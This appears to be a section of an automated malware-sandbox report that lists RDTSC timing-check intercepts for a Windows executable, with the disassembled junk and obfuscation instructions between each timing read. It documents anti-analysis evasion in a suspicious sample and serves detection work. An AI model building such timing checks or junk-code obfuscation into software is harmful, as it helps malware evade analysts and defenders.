Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB1B second address: BAFB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB1F second address: BAFB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAFB25 second address: BAFB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB33F7 second address: BB33FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB33FC second address: BB3407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB3545 second address: BB3550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3F4513F26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB3550 second address: BB3580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007FA3F4E97196h 0x0000000b popad 0x0000000c jmp 00007FA3F4E971A2h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA3F4E9719Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBB95C second address: BBB97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3F4513F2Fh 0x0000000c jc 00007FA3F4513F2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD0C second address: BBAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD10 second address: BBAD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD16 second address: BBAD33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FA3F4E97196h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD33 second address: BBAD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAD37 second address: BBAD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBAE60 second address: BBAE83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA3F4513F3Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBB572 second address: BBB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA3F4E971A9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE2BF second address: BBE2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE7A8 second address: BBE7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BBE7AC second address: BBE7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC326F second address: BC3277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3277 second address: BC327B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC327B second address: BC329E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Dh 0x00000007 jmp 00007FA3F4E9719Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B690F7 second address: B69104 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69104 second address: B69108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69108 second address: B69111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69111 second address: B69175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 sub edx, dword ptr [ebp+122D2B00h] 0x0000000d mov ebx, dword ptr [ebp+1247F0EEh] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FA3F4E97198h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jmp 00007FA3F4E971A6h 0x00000032 add eax, ebx 0x00000034 mov dx, bx 0x00000037 push eax 0x00000038 jl 00007FA3F4E971B9h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA3F4E9719Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3924 second address: BC392A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC392A second address: BC3934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3934 second address: BC394D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC394D second address: BC3951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BC3951 second address: BC3996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FA3F4513F30h 0x0000000d jmp 00007FA3F4513F39h 0x00000012 jnl 00007FA3F4513F26h 0x00000018 popad 0x00000019 pushad 0x0000001a jne 00007FA3F4513F26h 0x00000020 push esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCA9B2 second address: BCA9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCA9B8 second address: BCA9BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCACC0 second address: BCACD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5A9 second address: BCB5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA3F4513F2Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5BF second address: BCB5C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCB5C5 second address: BCB5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB2A second address: BCBB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB2E second address: BCBB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB34 second address: BCBB3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB3A second address: BCBB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB3E second address: BCBB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BCBB42 second address: BCBB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FA3F4513F32h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F24 second address: BD5F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007FA3F4E9719Eh 0x00000011 jmp 00007FA3F4E971A1h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F63 second address: BD5F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5F69 second address: BD5F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA3F4E971A4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52AA second address: BD52B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52B0 second address: BD52C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FA3F4E97196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52C0 second address: BD52C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52C4 second address: BD52DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 je 00007FA3F4E97198h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007FA3F4E97196h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD52DD second address: BD52E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5877 second address: BD587D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5B6C second address: BD5B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BD5CA1 second address: BD5CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DE4 second address: B20DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DE9 second address: B20DFD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA3F4E9719Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20DFD second address: B20E13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B20E13 second address: B20E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD271 second address: BDD275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD275 second address: BDD279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD6E3 second address: BDD6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD877 second address: BDD87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDD9E4 second address: BDDA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FA3F4513F36h 0x00000011 jmp 00007FA3F4513F38h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e js 00007FA3F4513F26h 0x00000024 jnl 00007FA3F4513F26h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDB80 second address: BDDB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDB84 second address: BDDBA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FA3F4513F35h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDDBA7 second address: BDDBC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDE7EE second address: BDE80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F2Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3F4513F2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BDCE52 second address: BDCE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BCB second address: BF0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BD1 second address: BF0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0BD5 second address: BF0BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jng 00007FA3F4513F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF07DA second address: BF07DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF07DE second address: BF07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF093F second address: BF0965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF0965 second address: BF0969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8BD9 second address: BF8C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3F4E971A6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C0E second address: BF8C4B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4513F26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA3F4513F33h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA3F4513F39h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C4B second address: BF8C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF8C68 second address: BF8C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87D0 second address: BF87D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87D4 second address: BF87DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87DA second address: BF87F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3F4E971A1h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BF87F1 second address: BF87F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C056BC second address: C056C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C056C6 second address: C056D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11CE9 second address: C11CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11CFE second address: C11D08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11D08 second address: C11D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C11D19 second address: C11D34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA3F4513F26h 0x00000008 jo 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FA3F4513F26h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105DC second address: C105EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105EB second address: C105F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C105F1 second address: C10600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007FA3F4E9719Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E18 second address: C10E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E1C second address: C10E2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4E97196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E2B second address: C10E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA3F4513F2Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E41 second address: C10E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E971A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C10E5D second address: C10E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
